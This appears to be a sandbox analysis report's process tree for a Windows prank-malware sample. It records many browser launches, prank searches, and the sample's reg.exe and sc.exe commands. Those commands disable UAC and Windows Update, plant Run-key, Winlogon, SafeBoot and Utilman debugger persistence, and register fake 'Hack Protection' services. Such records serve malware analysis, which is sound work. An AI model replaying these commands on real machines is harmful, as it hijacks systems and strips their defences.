C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=8840,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6600 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=8700,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=8604,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=8512 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8300,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7896 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=6160,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=6532 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=9272,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=8236 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9184,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9188 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=8960,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=9388,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9380 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=9004,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9372 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=9552,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9532 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=9692,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9516 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=9408,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9728 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9732,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9744 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=8256,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9884 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=9992,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=10000 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=10032,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9588 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=10116,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=10144 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=9000,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=9880 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=10072,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=10324 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10088,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=10292 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --always-read-main-dll --field-trial-handle=10184,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=8452 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --always-read-main-dll --field-trial-handle=10360,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=10524 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --always-read-main-dll --field-trial-handle=10480,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=10544 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=10752,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=10092 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=10788,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=10760 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=10916,i,13489149015218793444,6278030905929089676,262144 --variations-seed-version --mojo-platform-channel-handle=10764 /prefetch:14⤵
-
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=youtube+killscreen3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=dank+ajae3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=mydoom+virus+free+download+no+virus3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=my+computer+is+doing+weird+things+wtf+is+happening+plz+halp3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=fuck+you3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=bfdi+hax+download3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://softendo.com/3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=new+super+mario+bros+forever+2012+download+no+virus3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=bored+smashing3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=batch+virus+download3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youareanidiot.cc/3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=i+crave+beans3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.nl/search?q=smoll+pp3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=strawberry+benis3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=cats+with+no+braincells3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=cats+kissing+gif3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=theshellshield3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=stinky+bitch3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=guys+im+drunk3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=coiny+dont+stop3⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=h3lp+m33⤵
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=nitro+generator+WITH+virus3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K cds.bat3⤵
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
C:\Windows\system32\mode.commode 304⤵
-
-
C:\Windows\system32\mode.commode 804⤵
-
-
C:\Windows\system32\mode.commode 704⤵
-
-
C:\Windows\system32\mode.commode 504⤵
-
-
C:\Windows\system32\mode.commode 404⤵
-
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\ColorFiltering" /v "Active" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v "Configuration" /t REG_SZ /d "colorfiltering" /f3⤵
-
-
C:\Windows\system32\sc.exesc.exe create "Swift Hack Protection" binpath= "C:\Windows\System32\sex.exe"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc.exe create "Hack Protection Swift" binpath= "C:\Windows\System32\mbr.exe"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config "Hack Protection Swift" start= auto3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config "Swift Hack Protection" start= auto3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config "wuauserv" start= disabled3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config "bits" start= disabled3⤵
- Launches sc.exe
-
-
C:\Windows\system32\cscript.execscript email_spam.vbs3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\ColorFiltering" /v "FilterType" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /f /d "explorer.exe, C:\Windows\System32\sex.exe"3⤵
- Modifies WinLogon for persistence
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "sex.exe" /d "C:\Windows\System32\sex.exe"3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "sex.exe" /d "C:\Windows\System32\sex.exe"3⤵
- Adds Run key to start application
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "mbr.exe" /d "C:\Windows\N3OS3X3R\mbr.exe"3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "player.vbs" /d "player.vbs"3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\SafeBoot /v AlternateShell /t REG_SZ /d "C:\Windows\System32\sex.exe" /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName /v "ComputerName" /t REG_SZ /d "Neo" /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s1159" /t REG_SZ /d "Neo" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s2359" /t REG_SZ /d "Neo" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sCountry" /t REG_SZ /d "Country of Sex" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sCurrency" /t REG_SZ /d "Neo" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sNativeDigits" /t REG_SZ /d "Neo" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Console" /v "CursorSize" /t REG_DWORD /d "199" /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\ColorFiltering" /v "FilterType" /t REG_DWORD /d 0 /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Policies\CredentialUI" /v "DisablePasswordReveal" /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v BatteryFlyout /t REG_DWORD /f /d 03⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v HelpCustomized /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Manufacturer /t REG_SZ /f /d "Neo"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Model /t REG_SZ /f /d "Neo"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportHours /t REG_SZ /f /d "Neo"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportPhone /t REG_SZ /f /d "Neo"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportURL /t REG_SZ /f /d "http://www.neocorporations.com"3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\MTCUVC" /v EnableMtcUvc /t REG_DWORD /f /d 03⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /f /d 03⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayNetworkSelectionUI /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo.vbs"3⤵
-
-
